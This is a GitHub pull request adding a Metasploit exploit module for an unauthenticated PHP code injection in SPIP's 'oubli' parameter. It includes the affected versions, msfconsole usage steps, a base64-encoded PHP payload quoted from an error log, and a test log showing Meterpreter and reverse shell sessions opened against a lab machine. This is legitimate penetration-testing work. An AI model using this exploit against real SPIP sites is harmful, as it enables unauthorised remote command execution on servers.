Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add a module for the latest SPIP vuln #17711

Merged
merged 1 commit into from
Apr 17, 2023
Merged

Add a module for the latest SPIP vuln #17711

merged 1 commit into from
Apr 17, 2023

Conversation

jvoisin
Copy link
Contributor

@jvoisin jvoisin commented Feb 27, 2023
edited
Loading

/!\ Please squash this PR before merging it. /!\

This module exploits a PHP code injection in SPIP. The vulnerability exists in
the oubli parameter and allows an unauthenticated user to execute arbitrary
commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are
concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.

Verification

List the steps needed to make sure this thing works

  • wget https://git.spip.net/spip-contrib-outils/checkout/src/branch/master/checkout.php
  • php checkout.php spip -b4.0.0 ./spip
  • cd ./spip
  • php -S 127.0.0.1:8080
  • Check the Notes below.
  • Start msfconsole
  • use exploit/unix/webapp/spip_rce_form
  • set PAYLOAD php/exec
  • set CMD 'touch /tmp/pwn.txt
  • Verify that the file /tmp/pwn.txt was created.

Notes

It seems that the php payload is currently broken under PHP8, since it doesn't wrap its bas64-encoded payload between quotes, resulting in the following error:

[Tue Feb 28 20:49:20 2023] 127.0.0.1:38911 [500]: POST /spip.php?page=spip_pass&lang=fr - Uncaught Error: Undefined constant "Lyo8P3BocCAvKiovIEBlcnJvcl9yZXBvcnRpbmcoMCk7IEBzZXRfdGltZV9saW1pdCgwKTsgQGlnbm9yZV91c2VyX2Fib3J0KDEpOyBAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywwKTsgJEZuckZadT1AaW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKTsgaWYoIWVtcHR5KCRGbnJGWnUpKXsgJEZuckZadT1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCAnLCcsICRGbnJGWnUpOyAkRm5yRlp1PWV4cGxvZGUoJywnLCAkRm5yRlp1KTsgJEZuckZadT1hcnJheV9tYXAoJ3RyaW0nLCAkRm5yRlp1KTsgfWVsc2V7ICRGbnJGWnU9YXJyYXkoKTsgfSAkYyA9IGJhc2U2NF9kZWNvZGUoImRHOTFZMmdnTDNSdGNDOXdkMjVsWkM1MGVIUT0iKTsgaWYgKEZBTFNFICE9PSBzdHJwb3Moc3RydG9sb3dlcihQSFBfT1MpLCAnd2luJyApKSB7ICRjPSRjLiIgMj4mMVxuIjsgfSAkem9BeUFJUT0naXNfY2FsbGFibGUnOyAkR0xNRGFrPSdpbl9hcnJheSc7IGlmKCR6b0F5QUlRKCdleGVjJylhbmQhJEdMTURhaygnZXhlYycsJEZuckZadSkpeyAkcGlUYU1uST1hcnJheSgpOyBleGVjKCRjLCRwaVRhTW5JKTsgJHBpVGFNbkk9am9pbihjaHIoMTApLCRwaVRhTW5JKS5jaHIoMTApOyB9ZWxzZSBpZigkem9BeUFJUSgncG9wZW4nKWFuZCEkR0xNRGFrKCdwb3BlbicsJEZuckZadSkpeyAkZnA9cG9wZW4oJGMs" in /home/jvoisin/dev/spip/ecrire/public/evaluer_page.php(51) : eval()'d code:19

This can be fixed by changing return "eval(base64_decode(" + b64 + ")); to return "eval(base64_decode('" + b64 + "')); in modules/encoders/php/base64.rb, and this is exactly what #17723 is doing.

This vulnerability doesn't have a CVE.

@jvoisin jvoisin marked this pull request as ready for review February 28, 2023 20:14
@laluka
Copy link

laluka commented Feb 28, 2023

Worked on this one as a rubber-ducky-debugger, for what it's worth, this exploit is quite minimal (which is perfect to lower the number of bugs) and gets the job done.
Thanks for this @jvoisin ! 💮

@jheysel-r7 jheysel-r7 self-assigned this Feb 28, 2023
jheysel-r7
jheysel-r7 requested changes Mar 2, 2023
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @jvoisin, thanks so much for the awesome contribution. I've made a couple minor suggestions.

Mainly I think this would be a great opportunity to make use of the command stager functionality in metasploit. This gives the user the option to either run a unix command when exploiting the module or return a meterpreter session. More on the command stager can be read about here: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html.

Let me know if you have any questions at all regarding command stagers, I'd be happy to help in any way I could.

documentation/modules/exploit/unix/webapp/spip_rce_form.md Show resolved Hide resolved
documentation/modules/exploit/unix/webapp/spip_rce_form.md Outdated Show resolved Hide resolved
modules/exploits/unix/webapp/spip_rce_form.rb Outdated Show resolved Hide resolved
modules/exploits/unix/webapp/spip_rce_form.rb Outdated Show resolved Hide resolved
modules/exploits/unix/webapp/spip_rce_form.rb Outdated Show resolved Hide resolved
modules/exploits/unix/webapp/spip_rce_form.rb Outdated Show resolved Hide resolved
modules/exploits/unix/webapp/spip_rce_form.rb Outdated Show resolved Hide resolved
jheysel-r7
jheysel-r7 requested changes Mar 27, 2023
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @jvoisin, thanks for making those changes. I've made a couple more suggestions which fix the linting issue and standardizes the execute_command method. I was hoping they would also fix the module but I couldn't seem to get it working.

Could you please:

  1. Retest the module
  2. Update the Scenarios section of the documentation.

I'm not sure what preventing the shell from returning, hard to say with the link to PoC still returning a 502. Thank you!

modules/exploits/unix/webapp/spip_rce_form.rb Show resolved Hide resolved
modules/exploits/unix/webapp/spip_rce_form.rb Outdated Show resolved Hide resolved
@jheysel-r7 jheysel-r7 merged commit db853f9 into rapid7:master Apr 17, 2023
@jheysel-r7
Copy link
Contributor

Thanks for making all those changes @jvoisin! Testing looked great, I've squashed and merged 🚀

msf6 exploit(unix/webapp/spip_rce_form) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(unix/webapp/spip_rce_form) > set rport 8000
rport => 8000
msf6 exploit(unix/webapp/spip_rce_form) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/webapp/spip_rce_form) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: a4JbePyJmkqJ/6hwwumGfV8ytMpMz/U4WsgxqV5HUg76ZsdRNJ32zFfHQcvOpDDhHB7ZBn5+yPpkRCxedsLCbcuuTLru/sulTg==
[*] 172.16.199.131:8000 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:43456) at 2023-04-17 15:13:23 -0400


meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 5.19.0-38-generic #39~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 17 21:16:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.131 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(unix/webapp/spip_rce_form) > set target 1
target => 1
msf6 exploit(unix/webapp/spip_rce_form) > run

[*] Started reverse TCP double handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: a4JbePyJmkqJ/6hwwumGfV8ytMpMz/U4WsgxqV5HUg76ZsdRNJ32zFfHQcvOpDDhHB7ZBn5+yPpkRCxedsLCbcuuTLru/sulTg==
[*] 172.16.199.131:8000 - Attempting to exploit...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo PRx2DFOeACZbW9jV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "PRx2DFOeACZbW9jV\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.131:44028) at 2023-04-17 15:14:25 -0400

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
uname -a
Linux msfuser-virtual-machine 5.19.0-38-generic #39~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 17 21:16:15 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

@jvoisin jvoisin deleted the spip branch April 18, 2023 11:49
@dwelch-r7 dwelch-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 21, 2023
@dwelch-r7
Copy link
Contributor

Release Notes

This module exploits a PHP code injection in SPIP. The vulnerability exists in the oubli parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

@just1602 just1602 just1602 left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

@cgranleese-r7 cgranleese-r7 Awaiting requested review from cgranleese-r7

Assignees

@jheysel-r7 jheysel-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
7 participants
@jvoisin @laluka @jheysel-r7 @dwelch-r7 @just1602 @adfoster-r7 @cgranleese-r7